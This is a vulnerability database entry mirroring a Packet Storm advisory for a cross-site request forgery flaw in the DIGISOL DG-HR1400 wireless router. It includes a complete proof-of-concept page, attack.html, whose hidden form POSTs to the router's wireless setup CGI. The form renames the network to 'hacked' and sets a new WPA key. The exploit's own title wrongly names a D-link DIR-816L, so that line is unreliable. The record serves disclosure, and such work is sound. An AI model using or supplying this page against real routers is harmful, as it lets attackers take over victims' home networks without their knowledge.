ID

VAR-E-201702-0506


TITLE

DIGISOL DG-HR1400 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 141235

DESCRIPTION

DIGISOL DG-HR1400 wireless router suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 141235

AFFECTED PRODUCTS

vendor:digisolmodel:dg-hr1400scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 141235

EXPLOIT

Title:
====

D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF)
vulnerability

Credit:
======

Name: Indrajith.A.N

Date:
====

21-02-2017

Vendor:
======

DIGISOL router is a product of Smartlink Network Systems Ltd. is one of
India's leading networking company. It was established in the year 1993 to
prop the Indian market in the field of Network Infrastructure.

Product:
=======

DIGISOL DG-HR1400 is a wireless Router

Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf

Abstract:
=======

Cross-Site Request Forgery (CSRF) vulnerability in the DIGISOL DG-HR1400
wireless router enables an attacker to perform an
unwanted action on a wireless router for which the user/admin is currently
authenticated.

Affected Version:
=============

<=1.00.02

Exploitation-Technique:
===================

Remote

Severity Rating:
===================

7.9

Details:
=======

An attacker who lures a DG-HR1400 authenticated user to browse a malicious
website can exploit cross site request
forgery (CSRF) to submit commands to wireless router and gain control of
the product. The attacker could
submit variety of commands including but not limited to changing the SSID
name, password, security type etc.

Proof Of Concept:
================

1) User login to DG-HR1400 wireless router

2) User visits the attacker's malicious web page (attack.html)

3) attack.html exploits CSRF vulnerability and changes the SSID name and
password

PoC video link:
https://drive.google.com/file/d/0B6715xUqH18MeV9GOVE0ZmFrQUU/view

Exploit code (attack.html):

<html>
Digisol Router CSRF Exploit - Indrajith A.N
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="apssid" value="hacked" />
<input type="hidden" name="startScanUplinkAp" value="0" />
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="hacked" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="6" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method&#95;cur" value="6" />
<input type="hidden" name="method" value="6" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="csrf1234" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm"
value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Credits:
=======

Indrajith.A.N

Security Analyst.

https://www.indrajithan.com/

--
Indrajith

Trust: 0.5

sources: PACKETSTORM: 141235

EXPLOIT HASH

LOCAL

SOURCE

md5: 07159f43eabf68127a0f05c9e490b006
sha-1: 7d3777d50d17101aff7917954c595f7f1c8ee7d8
sha-256: 99b0bcc098c8f9cc5cb9af3cf6d1ccd41f42458bafb1d68e6455336f95c1505d
md5: 07159f43eabf68127a0f05c9e490b006

Trust: 0.5

sources: PACKETSTORM: 141235

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 141235

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 141235

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 141235

CREDITS

Indrajith A.N

Trust: 0.5

sources: PACKETSTORM: 141235

EXTERNAL IDS

db:PACKETSTORMid:141235

Trust: 0.5

sources: PACKETSTORM: 141235

SOURCES

db:PACKETSTORMid:141235

LAST UPDATE DATE

2022-07-27T09:29:47.780000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:141235date:2017-02-22T04:02:22